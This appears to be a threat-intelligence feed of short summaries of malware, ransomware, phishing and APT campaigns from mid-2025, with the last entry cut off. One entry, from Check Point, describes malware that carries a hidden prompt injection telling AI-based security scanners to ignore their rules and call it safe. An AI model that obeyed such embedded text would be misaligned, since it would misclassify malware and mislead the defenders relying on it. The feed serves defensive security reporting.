Threat Research Feed

2025-07-17
Belarus_Linked_CHM_Downloader_Targeting_Poland
MEDIUM
+
Intel Source:
Dmpdump
Intel Name:
Belarus_Linked_CHM_Downloader_Targeting_Poland
Date of Scan:
2025-07-17
Impact:
MEDIUM
Summary:
Researchers from dmpdump have observed a malicious HTML Help file exploiting Windows HTML Help to deploy a multi-stage downloader. Delivered as a fake bank transfer notification on June 30, 2025, the CHM triggers obfuscated script that leverages an ActiveX control to extract a staged loader from a CAB container. That loader uses XOR-based decryption and native HTTP APIs to fetch a concealed payload embedded in an image hosted on a remote server, then decrypts and executes it. The final payload establishes persistence by registering a scheduled task via COM. UNC1151 (FrostyNeighbor), a Belarus-linked actor, likely aims to maintain stealthy long-term access. The campaign’s living-off-the-land techniques and banking-themed lure illustrate advanced evasion.
Source: https://dmpdump.github.io/posts/Belarus-nexus_Threat_Actor_Target_Poland/
2025-07-17
Rainbow_Hyena_Phishing_Alert
HIGH
+
Intel Source:
BI.ZONE
Intel Name:
Rainbow_Hyena_Phishing_Alert
Date of Scan:
2025-07-17
Impact:
HIGH
Summary:
Researchers at BI.ZONE have identified that Rainbow Hyena launched a late-June phishing campaign targeting Russian healthcare and IT organizations, delivering ZIP-based polyglot attachments that conceal a decoy document and an LNK dropper to deploy the custom PhantomRemote backdoor. The operation used compromised sender addresses and recognizable branding to evade email filters and trick recipients into executing the payload. PhantomRemote launches via rundll32.exe and cmd.exe, harvests system identifiers (GUID, computer name, domain), and establishes HTTP-based C2 channels to download additional executables and exfiltrate command results. It creates persistent directories under %PROGRAMDATA% (YandexCloud or MicrosoftAppStore) for payload staging. Hidden PowerShell execution, binary obfuscation through polyglot files, and direct IP-based C2 demonstrate advanced evasion and access capabilities.
Source: https://bi.zone/eng/expertise/blog/rainbow-hyena-snova-atakuet-novyy-bekdor-i-smena-taktik/
2025-07-16
Octalyn_Stealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
Octalyn_Stealer
Date of Scan:
2025-07-16
Impact:
LOW
Summary:
Cyfirma researchers have discovered a new malware called Octalyn Stealer, which is designed to steal sensitive data from Windows systems. It is built in C++ and comes with a Delphi-based builder tool, allowing low-skilled attackers to create custom malware using Telegram bot token and chat ID. Once executed, it silently steals browser passwords, cookies, Discord and Telegram tokens, VPN settings, gaming account info, and cryptocurrency wallet data. The malware achieves persistence by modifying the Startup folder and Windows registry key to run automatically at system startup.. It can also deliver additional malicious files using hidden PowerShell scripts. The stolen data is saved in a temporary folder named Octalyn, zipped into an archive, and then exfiltrated to the attacker via the Telegram API.
Source: https://www.cyfirma.com/research/octalyn-stealer-unmasked/
2025-07-16
Multi_Stage_Phishing_via_Reservation_Portals
MEDIUM
+
Intel Source:
Google Threat Intelligence
Intel Name:
Multi_Stage_Phishing_via_Reservation_Portals
Date of Scan:
2025-07-16
Impact:
MEDIUM
Summary:
Researchers at Google Threat Intelligence have uncovered a large-scale phishing operation exploiting legitimate reservation messaging channels to harvest payment credentials and personal data. The campaign employed a multi-stage infrastructure, with Tier 1 redirectors registered to domains mimicking genuine hotel confirmations and Tier 2 hosts serving fraudulent booking sites. Activity accelerated from January 2025, peaking in May and June, and was observed through both in-app chat threads and authentic-looking emails. Actors leveraged automated domain registration and meta-tag analysis to expand their infrastructure, then delivered victims a malicious archive containing logs of stolen guest booking details.
Source: https://www.googlecloudcommunity.com/gc/Community-Blog/Actionable-threat-hunting-with-GTI-II-Analyzing-a-massive/ba-p/923129?linkId=15662116
2025-07-16
Dark_101_Ransomware
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Dark_101_Ransomware
Date of Scan:
2025-07-16
Impact:
MEDIUM
Summary:
FortiGuard researchers have discovered a new ransomware called Dark 101, leveraging .NET framework. It uses environmental checks and time-based delays to evade sandbox analysis. Once on a system, it hides by copying itself to the %AppData% folder under the name svchost.exe, mimicking a legitimate Windows system process. It then executes several commands such as vssadmin, wmic, and wbadmin to delete Volume Shadow Copies and the Windows Backup catalog. Additionally, it disables Task Manager by modifying system registry settings to prevent users from closing it manually. The malware scans for files with specific extensions, encrypts them, appends a random four-letter extension to the filenames and drops a read_it.txt ransom note demanding payment in Bitcoin. As a result, victims are left without easy recovery options and face significant operational disruption and potential financial loss.
Source: https://www.fortinet.com/blog/threat-research/fortisandbox-detects-dark-101-ransomware-despite-evasion-techniques
2025-07-16
GLOBAL_GROUP_RaaS_Operator
MEDIUM
+
Intel Source:
EclecticIQ
Intel Name:
GLOBAL_GROUP_RaaS_Operator
Date of Scan:
2025-07-16
Impact:
MEDIUM
Summary:
EclecticIQ researchers have uncovered a new ransomware -as-a-service (RaaS) group dubbed GLOBAL_GROUP, operated by the threat actor “$$$”. This group offers 85% share of ransom payments, along with user-friendly features like a mobile-accessible control panel and an AI-driven negotiation system. Their affiliates gain initial network access through brokers and brute-force tools to deploy customized ransomware capable of encrypting data across Windows, Linux, macOS, and VMware ESXi hosts. Once inside, affiliates communicate with victims through encrypted Tor-based sites to demand ransom and leverage AI-powered chatbots to engage victims during ransom negotiations, aiming to increase psychological pressure. So far, their attacks have impacted organizations in sectors like healthcare, oil-and-gas, industrial manufacturing, automotive services, and outsourcing, with victims located in countries including the U.S., U.K., Australia, and Brazil.
Source: https://blog.eclecticiq.com/global-group-emerging-ransomware-as-a-service
2025-07-15
A_Hybrid_Approach_of_BlackSuit_Ransomware
MEDIUM
+
Intel Source:
Cybereason
Intel Name:
A_Hybrid_Approach_of_BlackSuit_Ransomware
Date of Scan:
2025-07-15
Impact:
MEDIUM
Summary:
Researchers from Cybereason have uncovered a ransomware group known as BlackSuit that emerged in mid-2023 and is believed to be a successor to the Royal ransomware group. The group operates organized, multi-stage attacks involving both data exfiltration and file encryption. The attackers leverage Cobalt Strike Beacon for C2, deploy payload through PowerShell commands and disguising legitimate tools like rclone.exe to evade detection. They move laterally across the network using tools like PsExec, RPC, and RDP, even adding fake administrator accounts to gain wider access. The attackers also steal credentials from LSASS for privilege escalation and exfiltrates 6around 60 GB of sensitive data to cloud-based servers and demand ransom between $1 million and $10 million in Bitcoin.
Source: https://www.cybereason.com/blog/blacksuit-data-exfil
2025-07-12
Kimsuky_Deploys_VMP_Protected_HappyDoor_Backdoor
MEDIUM
+
Intel Source:
360 Threat Intelligence Center
Intel Name:
Kimsuky_Deploys_VMP_Protected_HappyDoor_Backdoor
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
The 360 Threat Intelligence Center have identified a recent espionage campaign attributed to the North Korean-based APT group Kimsuky (APT-C-55), targeting entities in South Korea. The threat actor uses a trojanized installer for the legitimate Bandizip software as an initial access vector. Upon execution, the installer deploys the HappyDoor backdoor, a known Kimsuky tool, which has been newly upgraded with a VMProtect shell to significantly hinder analysis and evade detection. The multi-stage infection process also involves using mshta.exe to fetch remote VBScript payloads for reconnaissance and data exfiltration. The backdoor establishes persistence via scheduled tasks and is capable of keylogging, screen capture, and stealing files with specific extensions such as .hwp and .pdf.
Source: https://mp.weixin.qq.com/s/fDan8ihUQEAF5Kf_6fXATQ?
2025-07-12
Fake_CAPTCHA_Social_Engineering
LOW
+
Intel Source:
Linkedin
Intel Name:
Fake_CAPTCHA_Social_Engineering
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Shaquib Izhar’s analysis on LinkedIn revealed an emerging social engineering campaign that ensnares victims with a counterfeit CAPTCHA page mimicking a common web security check. Upon clicking “Verify,” the page silently copies PowerShell code to the clipboard and prompts users to launch the Windows Run dialog, where it registers a webhook to monitor execution. The payload chain then delivers a secondary PowerShell loader and a batch script designed to detect and bypass virtualized environments before unleashing additional malware on standard Windows systems.
Source: https://www.linkedin.com/posts/shaquib-izhar_a-very-cool-fake-captcha-social-engineering-activity-7346678407419613184-B0-Y/?utm_source=social_share_send&utm_medium=member_desktop_web&rcm=ACoAABO-jCkB1he5ufTfbYYMNKmaojg8M31OVpM
2025-07-12
Malicious_Inno_Setup_Loader_Deploys_RedLine_Stealer
LOW
+
Intel Source:
Splunk
Intel Name:
Malicious_Inno_Setup_Loader_Deploys_RedLine_Stealer
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Splunk researchers uncovered a new malware campaign that uses a fake software installer created with Inno Setup. This installer includes a Pascal script designed to detect and evade debugger and sandbox environments before retrieving and decrypting a multi-stage payload . The installer connects to a TinyURL link that redirects to a file-hosting site (rentry.org), where it downloads a password-protected ZIP file. Once extracted, the malware runs a loader that decrypts and executes a malicious DLL file which then loads a secondary payload known as HijackLoader. It also creates a hidden scheduled task called lang that runs a disguised program every time the system restarts. In the final stage, the attack drops RedLine Stealer which collects saved passwords, cookies, form-fill data, and crypto wallet keys from various browsers and extensions.
Source: https://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html
2025-07-12
SLOW_TEMPEST_Malware_Obfuscation
MEDIUM
+
Intel Source:
unit42
Intel Name:
SLOW_TEMPEST_Malware_Obfuscation
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
According to Unit 42’s analysis, SLOW#TEMPEST employs advanced control-flow obfuscation and dynamic jump dispatchers within a loader DLL to impede static reverse-engineering. The actor delivers an ISO-based dropper that uses the Windows API GlobalMemoryStatusEx to verify system memory exceeds six gigabytes before unpacking the payload, an anti-sandbox measure. First documented in July 2025, this campaign targets Windows environments where indirect function calls and obfuscated API invocations thwart signature and static analysis.
Source: https://unit42.paloaltonetworks.com/slow-tempest-malware-obfuscation/
2025-07-12
Prompt_Injection_Malware
LOW
+
Intel Source:
Checkpoint
Intel Name:
Prompt_Injection_Malware
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at Check Point have discovered a new malware called Skynet that was anonymously uploaded from the Netherlands. Although the malware is still in an early stage and not fully functional. The malware tries to trick AI-based security systems by including hidden prompt injection that instruct the AI to ignore its usual rules and incorrectly label the malware as safe. The malware also tries to evade detection using sandbox evasion, gathers basic system information and sets up a secure connection using the TOR network.
Source: https://research.checkpoint.com/2025/ai-evasion-prompt-injection/
2025-07-12
Rhadamanthys_Infostealer_ClickFix_CAPTCHA_Delivery
LOW
+
Intel Source:
Dark Atlas
Intel Name:
Rhadamanthys_Infostealer_ClickFix_CAPTCHA_Delivery
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at Darkatlas have identified the Rhadamanthys infostealer campaign using a typosquatted ClickFix CAPTCHA domain to deliver a stealthy PowerShell launcher that executes in memory and retrieves a malicious MSI package, enabling a fileless dropper flow. That dropper fetches and executes PTRFHDGS.msi via msiexec.exe, masquerading as legitimate software and displaying a fake “Verification complete!” prompt to deceive users. The malware employs multiple anti-analysis checks—including virtualization and debugger detection, as well as time-based side-channel evasion—to hinder sandbox and manual analysis. Once active, Rhadamanthys’ modular architecture harvests a broad range of sensitive data—system identifiers, browser credentials, cryptocurrency wallets, screenshots, and application configurations—from Windows hosts.
Source: https://darkatlas.io/blog/clickfix-chaos-a-deep-dive-into-rhadamanthys-infostealers-stealth-and-steal-tactics
2025-07-12
Exploitation_Wing_FTP_Serve_Vulnerability
MEDIUM
+
Intel Source:
Huntress
Intel Name:
Exploitation_Wing_FTP_Serve_Vulnerability
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers from Huntress discovered that attackers were actively exploiting a vulnerability (CVE-2025-47812) in Wing FTP Server versions prior to 7.4.4. This flaw allows attackers to execute remote code on the system with full privileges. The attackers sent crafted requests to the server’s login page, injecting malicious Lua scripts that enabled them to run system commands like cmd.exe and certutil. Once inside, the attackers run basic reconnaissance commands such as ipconfig, whoami, created two backdoor user accounts named wingftp and wing and tried to install a remote access tool (ScreenConnect) along with a second-stage malware payload. However, this activity was flagged and blocked by Microsoft Defender as Trojan named Ceprol.
Source: https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild
2025-07-12
Unauthorized_Proxy_Deployment_on_Linux_SSH
LOW
+
Intel Source:
ASEC
Intel Name:
Unauthorized_Proxy_Deployment_on_Linux_SSH
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at ASEC have identified a campaign in which attackers target Linux systems with weak SSH passwords. The attackers gain initial access through brute-force or dictionary attacks and then execute Bash scripts to install proxy software such as TinyProxy or Sing-box. In the TinyProxy, they modify the configuration to allow unrestricted internet access and ensure the proxy starts automatically with the system. The Sing-box involves downloading and executing a one-click installation script from a public GitHub repository, enabling support for multiple proxy protocols including vmess-argo and TUICv5. These proxies can be leveraged to conceal further malicious activity or sold for illicit use.
Source: https://asec.ahnlab.com/ko/88669/
2025-07-12
RedDirection_Malicious_Browser_Extensions
MEDIUM
+
Intel Source:
Medium (Koi Security)
Intel Name:
RedDirection_Malicious_Browser_Extensions
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers at Koi Security have observed eighteen malicious Chrome and Edge extensions that hijacked browser sessions and exfiltrated every visited URL from over 2.3 million users. Delivered via innocuous version updates through official auto-update pipelines, the extensions injected background scripts that captured tab URLs and unique identifiers, relaying them to a centralized command-and-control infrastructure. The attackers exploited trust signals verified publisher badges, featured placement and positive reviews—to evade marketplace vetting and persist undetected for years. Once activated, the malware periodically executed remote-instructed redirects to attacker-controlled sites, creating a persistent man-in-the-browser capability.
Source: https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5
2025-07-12
Defendnot_A_Silent_Windows_Defender_Disabler
MEDIUM
+
Intel Source:
Stairwell
Intel Name:
Defendnot_A_Silent_Windows_Defender_Disabler
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Stairwell researchers have highlighted a new tool called defendnot, developed by user named es3n1n, which is designed to quietly disable Microsoft Defender. This tool leverages a sneaky technique by registering itself as another antivirus program through Windows Security Center (WSC) API, causing Defender to voluntarily disable itself. Although defendnot was initially released for red teaming, its design makes it useful for cybercriminals or nation-state actors. If attackers use this tool after compromising a system, they can run malware without being detected.
Source: https://stairwell.com/resources/detecting-defendnot-a-tool-for-silently-disabling-windows-defender/
2025-07-12
Oyster_Broomstick_Backdoor_via_SEO_Poisoning
MEDIUM
+
Intel Source:
Arcticwolf
Intel Name:
Oyster_Broomstick_Backdoor_via_SEO_Poisoning
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers from Arctic Wolf have observed a malvertising campaign leveraging search engine optimization poisoning to redirect IT professionals to trojanized installers of PuTTY and WinSCP. Embedded within legitimate packages, the Oyster and Broomstick backdoors grant stealthy remote-access footholds on on-premises administrative workstations. The campaign’s reliance on trusted binaries and absence of overt indicators complicates detection and response.
Source: https://arcticwolf.com/resources/blog/malvertising-campaign-delivers-oyster-broomstick-backdoor-via-seo-poisoning-trojanized-tools/
2025-07-12
M365_Direct_Send_Phishing_Campaign
MEDIUM
+
Intel Source:
Varonis
Intel Name:
M365_Direct_Send_Phishing_Campaign
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers at Varonis have uncovered a phishing campaign exploiting Microsoft 365’s Direct Send feature to trick organizations. Normally, Direct Send is used by internal devices to send emails within an organisation without requiring authentication. The attackers send phishing emails disguised as voicemail notifications. These emails contain PDF attachments with QR codes. When scanned, the QR codes redirect victims to deceptive websites designed to steal their login credentials. The phishing email leverages IP located in Ukraine and bypasses basic email security checks like SPF, DKIM, or DMARC and delivered because the Direct Send feature treats them like internal messages. The campaign began in May 2025 and has already targeted over 70 organizations in the U.S., spanning different industries.
Source: https://www.varonis.com/blog/direct-send-exploit
2025-07-12
CapCut_Phishing_Campaign_Targets_Apple_Users
LOW
+
Intel Source:
Cofense
Intel Name:
CapCut_Phishing_Campaign_Targets_Apple_Users
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Cofense researchers have uncovered a phishing campaign in which attackers create a fake CapCut invoices to trick users to steal their Apple credentials and payment information. The attackers send fake email claiming a $49.99 CapCut Pro charge via Apple, prompting users to cancel the subscription. When clicked, they’re taken to a deceptive Apple login page hosted on a non-Apple website, where their Apple ID credentials are stolen. The attack then escalates with a second phishing page requesting credit card details under the guise of processing a refund. The attackers even show a fake two-factor authentication screen designed to steal both login and payment details while keeping the victim engaged. If successful, it can lead to account takeovers, stolen money and identity theft.
Source: https://cofense.com/blog/capcut-con-apple-phishing-card-stealing-refund-ruse
2025-07-12
Supply_Chain_Attack_Targets_Ethereum_Developers
LOW
+
Intel Source:
Reversinglabs
Intel Name:
Supply_Chain_Attack_Targets_Ethereum_Developers
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
ReversingLabs researchers uncovered a supply chain attack involving a GitHub user named Airez299, who compromised the ETHcode extension for Visual Studio Code. The attacker submitted a pull request that added a malicious dependency called keythereum-utils, which leverages Node.js’s require function to execute obfuscated JavaScript that silently launched a hidden PowerShell process. This process then downloaded and runs a secondary payload from a public file-hosting site. The campaign targets Ethereum smart contract developers through the extension’s automatic updates mechanism which had reached roughly 6,000 installs.
Source: https://www.reversinglabs.com/blog/malicious-pull-request-infects-vscode-extension
2025-07-12
Fake_SPID_Certificate_Renewal_Campaign
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Fake_SPID_Certificate_Renewal_Campaign
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
CERT-AGID researchers have observed a phishing campaign targeting SPID users. The campaign involves fraudulent emails with the subject “Your digital certificate has just been renewed”, prompting recipients to download a counterfeit digital certificate necessary for SPID access. Once clicked, recipients are redirected to a deceptive SPID login page to harvest credentials. Although the messages appear to come from noreply@spid.gov.it but actually sent from third-party servers lacking DKIM signatures and exploiting SPF misconfigurations to evade detection. If credentials are compromised, attackers could hijack SPID sessions, enabling unauthorized access to sensitive government and private-sector information.
Source: https://cert-agid.gov.it/news/il-tema-spid-ancora-sfruttato-per-una-nuova-campagna-di-phishing/
2025-07-12
Lumma_Stealer_Deploys_Follow_up_Malware
LOW
+
Intel Source:
Malware Traffic
Intel Name:
Lumma_Stealer_Deploys_Follow_up_Malware
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers from Malware-Traffic have identified a malware campaign distributing Lumma Stealer, which subsequently deploys a persistent backdoor. The initial infection vector is social engineering, luring victims with cracked "Turnitin" software promoted on a Facebook page as of June 26, 2025. The user downloads a password-protected archive containing a Nullsoft installer. Upon execution, the installer uses an obfuscated batch script and a legitimate AutoIt interpreter to run the Lumma Stealer payload, which exfiltrates data from the compromised Windows system. The stealer then downloads a secondary loader, which retrieves a penetration testing tool from GitHub and establishes persistence via a shortcut in the Windows Startup folder.
Source: https://www.malware-traffic-analysis.net/2025/06/26/index.html
2025-07-12
An_Investigation_of_Qilin_Ransomware
LOW
+
Intel Source:
Cyberint
Intel Name:
An_Investigation_of_Qilin_Ransomware
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at Cyberint have observed that Qilin operates as an affiliate ransomware-as-a-service program deploying Rust-based binaries via spearphishing links to deliver customized double extortion campaigns. The campaign first exfiltrates sensitive data through malicious links embedded in phishing emails and then encrypts critical files using configurable modes—skip-step, percent, or fast—to maximize impact. Operators terminate specific processes, inhibit system recovery, and reboot hosts to hinder remediation. Victim data from multiple industries and geographies is posted on a proprietary dark-web leak site, pressuring organizations to comply. Samples exist for Windows and ESXi platforms, with the Rust variant offering enhanced evasion and resistance to analysis. Large-scale exfiltration campaigns have stolen hundreds of gigabytes of financial and proprietary data, including 340 GB from a U.S. financial advisory firm on July 1, 2025.
Source: https://cyberint.com/blog/research/qilin-ransomware/
2025-07-11
GeoServer_CoinMiner_Exploit_Campaign
LOW
+
Intel Source:
ASEC
Intel Name:
GeoServer_CoinMiner_Exploit_Campaign
Date of Scan:
2025-07-11
Impact:
LOW
Summary:
Researchers at AhnLab Security Emergency response Center have observed ongoing exploitation of unpatched GeoServer instances following the CVE-2024-36401 disclosure in 2024, allowing adversaries to execute remote code and deploy Monero mining payloads. These actors conduct automated scans for vulnerable GeoServer hosts, leverage the Java-based RCE to install NetCat for reverse-shell access and XMRig via platform-native scripts on both Windows and Linux systems.
Source: https://asec.ahnlab.com/en/88917/
2025-07-11
DoNotAPT
HIGH
+
Intel Source:
Trellix
Intel Name:
DoNotAPT
Date of Scan:
2025-07-11
Impact:
HIGH
Summary:
According to Trellix Advanced Research Center, the DoNot APT group conducted a multi-stage spear-phishing campaign against a Southern European foreign affairs ministry to facilitate long-term cyber espionage . The attackers impersonated defense officials in a crafted email with a Google Drive link, delivering a password-protected RAR archive that deployed a custom “LoptikMod” backdoor masquerading as a PDF. Once executed, the malware used binary-encoded obfuscation, dynamic API resolution, and scheduled tasks to achieve persistence. It gathered system details—including CPU model, OS build, username, hostname, and installed software—encrypted them with AES, and exfiltrated via HTTPS POST to a malicious domain. Follow-on downloads of a DLL module (“socker.dll”) and additional scheduled tasks (“MicorsoftVelocity”) enabled further command and control. Primary targets were government and diplomatic organizations running Windows. The operation’s impact includes unauthorized access to sensitive diplomatic communications, exposure of MFA credentials, and sustained network compromise.
Source: https://www.trellix.com/blogs/research/from-click-to-compromise-unveiling-the-sophisticated-attack-of-donot-apt-group-on-southern-european-government-entities/
2025-07-10
Pay2KeyI2P_Iranian_RaaS_Targets_the_West
HIGH
+
Intel Source:
Morphisec
Intel Name:
Pay2KeyI2P_Iranian_RaaS_Targets_the_West
Date of Scan:
2025-07-10
Impact:
HIGH
Summary:
Morphisec's researchers have uncovered the resurgence of Pay2Key, an Iranian-backed ransomware-as-a-service (RaaS) operation now operating as Pay2Key.I2P and linked to the Fox Kitten APT group. Active since February 2025, this financially and ideologically motivated campaign targets Western organizations, particularly those perceived as enemies of Iran, and has already amassed over $4 million in ransoms. The attack begins with a sophisticated, multi-stage 7-Zip SFX payload that uses a polyglot CMD and PowerShell script to execute a series of anti-analysis checks and defense evasion techniques, including disabling Microsoft Defender. The final payload is the Themida-protected Mimic ransomware. With the recent addition of a Linux variant and a lucrative 80% profit share for affiliates attacking ideological targets, the threat surface is expanding.
Source: https://www.morphisec.com/blog/pay2key-resurgence-iranian-cyber-warfare/
2025-07-10
LogoKit_Phishing_Campaign
LOW
+
Intel Source:
Cyble
Intel Name:
LogoKit_Phishing_Campaign
Date of Scan:
2025-07-10
Impact:
LOW
Summary:
Researchers at Cyble have uncovered an ongoing phishing campaign that leverages LogoKit which is designed to steal login credentials by impersonating legitimate organizations. The threat actors are masquerading entities such as HunCERT, Kina Bank, the Catholic Church, and logistics companies to deceive users into entering their credentials. These fraudulent pages are hosted on Amazon S3 and Render and appear legitimate by incorporating Cloudflare Turnstile (a CAPTCHA service) and automatically retrieve real logos from Clearbit and Google Favicon. Once a victim enters their credentials, the data is exfiltrated to a C2 server through an HTTP POST request. The stolen credentials can enable attackers to gain unauthorized access, carry out business email compromise (BEC), move laterally within networks, and potentially cause major data breaches.
Source: https://cyble.com/blog/logokit-being-leveraged-for-credential-theft/
2025-07-10
SilentRoute_Backdoor_Exfiltrates_Credentials
MEDIUM
+
Intel Source:
ESentire
Intel Name:
SilentRoute_Backdoor_Exfiltrates_Credentials
Date of Scan:
2025-07-10
Impact:
MEDIUM
Summary:
Researchers at eSentire uncovered a campaign in which threat actors created a fake version of SonicWall’s NetExtender VPN client by adding a hidden backdoor called SilentRoute. This campaign leverages an SEO poisoning tactic to lure remote-access users into downloading this malicious version from legitimate looking website that hosts a malicious installer named SonicWall-NetExtender.msi. Once installed, it captures login credentials—including domain, username, and password which then exfiltrated to attacker-controlled server. The main objective of this campaign is to target the corporate users of the SonicWall VPN client, allowing attackers to log in to organisation networks as legitimate users, move laterally and conduct additional malicious activities.
Source: https://www.esentire.com/blog/threat-actors-recompile-sonicwalls-netextender-to-include-silentroute-backdoor
2025-07-10
A_Deep_Dive_into_XWorm_Malware
MEDIUM
+
Intel Source:
Splunk
Intel Name:
A_Deep_Dive_into_XWorm_Malware
Date of Scan:
2025-07-10
Impact:
MEDIUM
Summary:
Researchers at Splunk have identified XWorm that employs a rotating arsenal of droppers, stagers, and payloads to evade detection and maintain persistent access on Windows endpoints . It leverages phishing lures impersonating invoices, shipping notices, or business requests to trick users into executing malicious attachments. XWorm is delivered in multiple formats such as .exe, .js, .vbs, .bat, .hta, .lnk and it uses advanced-evasion techniques such as AMSI bypass, ETW disablement, and registry-based Defender exclusions. It employs persistence by creating registry keys, scheduled tasks, startup folder, DLL side-loading, and USB or removable-media. Once active, it performs discovery of AV products, video-capture drivers, and graphics card information before establishing HTTP-based C2 communications. The mail objective of this malware is unauthorized data access, potential lateral movement, and long-term undetected system compromise.
Source: https://www.splunk.com/en_us/blog/security/xworm-shape-shifting-arsenal-detection-evasion.html
2025-07-09
Batavia_Malware_Targeting_Russia
LOW
+
Intel Source:
Securelist
Intel Name:
Batavia_Malware_Targeting_Russia
Date of Scan:
2025-07-09
Impact:
LOW
Summary:
Securelist researchers have discovered a new malware strain called Batavia that emerged in July 2024. This malware targets Russian industrial enterprises and is delivered through spear-phishing emails disguised as business contracts. When a victim clicks the malicious link, it downloads a VBScript- downloader that decrypts and installs additional payloads which involves two separate executable files —WebView.exe and javav.exe, are used to collect sensitive files such as Microsoft Office documents, system logs, and files from USB drives or other removable media. Additionally, Batavia takes screenshots of the victim's screen and computes file hashes to avoid uploading duplicate files. The malware communicates with its C2 server over HTTPS and obfuscates its payloads using XOR and Base64 encoding. To maintain persistence, it creates a shortcut in the Start Menu's startup folder, ensuring execution on each user login.
Source: https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/
2025-07-09
NordDragonScan_Target_Window_Systems
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
NordDragonScan_Target_Window_Systems
Date of Scan:
2025-07-09
Impact:
MEDIUM
Summary:
Researchers at FortiGuard have discovered a new information-stealing malware called NordDragonScan, targeting Windows systems primarily in Ukraine’s government and energy sectors. The malware is distributed through shortened URLs and malicious shortcut files which executes a malicious HTA script that installs a .NET-based payload. It leverages a legitimate PowerShell binary to downloads a hidden payload and installs a file named adblocker.exe inside a folder named NordDragonScan. Once installed, it collects system information, capture screenshots, steals files and PDFs from common directories and extracts saved browser data from Chrome and Firefox. Additionally, it also scans the local network to identify other reachable systems and exfiltrates all collected data to a remote server over HTTPS. Victims are lured with fake Ukrainian-language documents related to government and energy sector communications.
Source: https://www.fortinet.com/blog/threat-research/norddragonscan-quiet-data-harvester-on-windows
2025-07-09
XMRig_Global_Cryptomining_Campaign
LOW
+
Intel Source:
GData
Intel Name:
XMRig_Global_Cryptomining_Campaign
Date of Scan:
2025-07-09
Impact:
LOW
Summary:
Researchers at GDATA Security Lab have identified a global cryptomining campaign leveraging XMRig to mine Monero cryptocurrency that emerged in April 2025. The campaign begins with the execution of batch script files via svchost.exe, followed by PowerShell commands that download and execute additional payloads. The attackers create scheduled tasks to disable Windows Defender and automatic update services before deploying the XMRig miner under random names to evade detection. They use LOLBAS techniques and hidden PowerShell windows to ensure persistence, leading to down system performance, increased energy consumption, and disruption of system maintenance. The malware has been observed in multiple countries, indicating targets systems worldwide.
Source: https://www.gdatasoftware.com/blog/2025/07/38228-monero-malware-xmrig-resurgence
2025-07-08
NightEagle_Exploits_Exchange_for_Espionage
MEDIUM
+
Intel Source:
RedDrip7
Intel Name:
NightEagle_Exploits_Exchange_for_Espionage
Date of Scan:
2025-07-08
Impact:
MEDIUM
Summary:
Researchers at RedDrip7 have disclosed that the APT group NightEagle exploited a previously unknown Microsoft Exchange deserialization vulnerability to achieve remote code execution on targeted Exchange servers. The group’s operations appear to be strategically motivated, with a focus on exfiltrating sensitive email data from high-tech Chinese organizations. To establish internal network access, NightEagle deployed a modified Chisel reverse tunnel disguised as a legitimate Synology update service. This was followed by memory-only injection of a custom .NET loader delivered through virtual URL web shells. The implant enabled sustained, covert remote email harvesting and command execution while avoiding disk-based detection mechanisms.
Source: https://github.com/RedDrip7/NightEagle_Disclose/blob/main/Exclusive%20disclosure%20of%20the%20attack%20activities%20of%20the%20APT%20group%20NightEagle.pdf
2025-07-08
Tomcat_Partial_PUT_Camel_Header_Hijack
MEDIUM
+
Intel Source:
unit42
Intel Name:
Tomcat_Partial_PUT_Camel_Header_Hijack
Date of Scan:
2025-07-08
Impact:
MEDIUM
Summary:
During March 2025, Unit 42 observed a surge in attacks leveraging two critical Apache vulnerabilities. CVE-2025-24813 permits remote deserialization via Tomcat’s standard partial PUT mechanism, and CVE-2025-27636/29891 abuse Camel’s header processing to execute arbitrary commands. Exploitation attempts exceeded 7,800 across more than 70 countries, confirming a global automated campaign. Attackers identify targets via session name enumeration and Content-Range manipulation before delivering payloads that result in remote code execution.
Source: https://unit42.paloaltonetworks.com/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/
2025-07-07
Datacarry_Ransomware_Campaign
MEDIUM
+
Intel Source:
CCITIC
Intel Name:
Datacarry_Ransomware_Campaign
Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
The Cyber Counter-Intelligence Threat Investigation Consortium (CCITIC) have identified a targeted campaign by the Datacarry ransomware group, active since June 2024 and significantly intensifying in spring 2025. The group exploiting a critical vulnerability in Fortinet EMS (CVE-2023-48788) to gain initial access. Following exploitation, they use PowerShell to configure the environment for deploying a Go-based implant, which enables persistent command-and-control communication via the Chisel tunneling tool over WebSockets. The actors exfiltrate large volumes of data before deploying a Conti-variant ransomware payload.
Source: https://www.ccitic.org/assets/reports/CCITIC_Report_TLP-White_DATACARRY.pdf
2025-07-07
APT36_Targets_Indian_Defence_Via_BOSS_Linux_Systems
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
APT36_Targets_Indian_Defence_Via_BOSS_Linux_Systems
Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
